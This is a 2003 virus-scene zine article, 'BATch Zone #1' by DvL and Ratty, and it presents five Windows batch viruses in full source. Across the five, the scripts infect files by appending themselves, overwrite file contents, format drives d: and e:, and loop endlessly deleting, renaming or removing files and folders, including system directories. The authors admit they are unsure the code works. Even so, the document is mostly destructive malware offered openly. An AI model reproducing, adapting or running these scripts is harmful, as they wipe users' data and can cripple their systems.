 
                                                 +-=-=-=-=-=-=-=-=-+
   .:The BATlle-Field virii (by DvL and Ratty):. |  BATch Zone #1  |
                                                 +-=-=-=-=-=-=-=-=-+


Note: I'm not sure if those virii are really working, the main reason for this is
====  that i don't have winxp installed and allmost BATlle-Field virii are made
      to work only under winxp, with litlle exceptions when the virus works both
      on win9x and winxp ;)

Those virii r trying to proove that lame but dangerous commands can take down a
"secure" OS like windozeXP ;) Also, those r my very first batchXP virii.

BATlle-Field a
---------------------------------------------------------------------------------
::
:: 14.05.2003
::
@echo off
ctty nul
ver | find "XP"
if errorlevel 1 goto w1nd0z3
if not errorlevel 1 goto :XP
:XP
for /r \ %%i in (*.*) do copy %%i+%0 %%i
:: The next line is unuseful :)
for /r \ %%i in (*.*) do echo DvL killed your DATA > %%i
if exist echo y | format e:
if exist echo y | format d:
goto XP
ctty con
exit
:w1nd0z3
@for %%a in (*.*, ..\*.*, %windir%\*.*, %windir%\system\*.*, c:\mydocu~1\*.*) do copy %%a+%0 %%a
@if exist echo y | format e:/q/autotest
@if exist echo y | format d:/q/autotest
goto w1nd0z3
ctty con
cls
---------------------------------------------------------------------------------

BATlle-Field b
---------------------------------------------------------------------------------
::
:: 18.05.2003
::
@echo off
ctty nul
ver | find "XP"
if errorlevel 1 goto done
if not errorlevel 1 goto :XP
:XP
for /r \ %%x in (c:\mydocu~1\*.*, c:\*.*, *.*, %windir%\*.*, %winbootdir%\*.*) do copy %%x+%0 %%x
ctty con
exit
:done
ctty con
cls
---------------------------------------------------------------------------------

BATlle-Field c
---------------------------------------------------------------------------------
::
:: 18.05.2003
::
@echo off
ctty nul
ver | find "XP"
if errorlevel 1 goto done
if not errorlevel 1 goto :XP
:XP
if exist c:\%random%. (del /f /s c:\%random%.) else echo c:\%random%. missing
if exist c:\%random%. (del /f /s c:\%random%.) else echo c:\%random%. missing
if exist c:\%random%. (del /f /s c:\%random%.) else echo c:\%random%. missing
if exist c:\%random%. (del /f /s c:\%random%.) else echo c:\%random%. missing
if exist c:\%random%. (del /f /s c:\%random%.) else echo c:\%random%. missing
if exist c:\%random%. (del /f /s c:\%random%.) else echo c:\%random%. missing
goto XP
ctty con
exit
:done
ctty con
cls
---------------------------------------------------------------------------------

BATlle-Field d
---------------------------------------------------------------------------------
::
:: 19.05.2003
::
@echo off
ctty nul
ver | find "XP"
if errorlevel 1 goto done
if not errorlevel 1 goto :XP
:XP
if exist c:\%random%. (ren c:\%random% %random%.) else echo c:\%random%. missing
if exist c:\%random%. (ren c:\%random% %random%.) else echo c:\%random%. missing
if exist c:\%random%. (ren c:\%random% %random%.) else echo c:\%random%. missing
if exist c:\%random%. (ren c:\%random% %random%.) else echo c:\%random%. missing
if exist c:\%random%. (ren c:\%random% %random%.) else echo c:\%random%. missing
if exist c:\%random%. (ren c:\%random% %random%.) else echo c:\%random%. missing
goto XP
ctty con
exit
:done
ctty con
cls
---------------------------------------------------------------------------------

BATlle-Field e
---------------------------------------------------------------------------------
::
:: 19.05.2003
::
@echo off
ctty nul
ver | find "XP"
if errorlevel 1 goto DvL
if not errorlevel 1 goto :XP
:DvL
@for %%k in (%windir%\system\*.*, c:\mydocu~1\*.*, *.*, ..\*.*, %windir%\*.*, %windir%\inf\*.*) do deltree/y %%k 
echo.msgbox "BAT command or file name !!!",0,"BATlle-Field.e by DvL">DvL.vbs
start DvL.vbs
cls
goto done
:XP
if exist c:\%random%. (rd /s /q c:\%random%.) else echo c:\%random%. missing
if exist c:\%random%. (rd /s /q c:\%random%.) else echo c:\%random%. missing
if exist c:\%random%. (rd /s /q c:\%random%.) else echo c:\%random%. missing
if exist c:\%random%. (rd /s /q c:\%random%.) else echo c:\%random%. missing
if exist c:\%random%. (rd /s /q c:\%random%.) else echo c:\%random%. missing
if exist c:\%random%. (rd /s /q c:\%random%.) else echo c:\%random%. missing
goto XP
ctty con
exit
:done
ctty con
cls
---------------------------------------------------------------------------------

.:Contact:. 

  .:mail:. dvl2003ro@yahoo.co.uk
  .:url:. www.geocities.com/ratty_dvl/BATch/main.htm

  29.05.2003
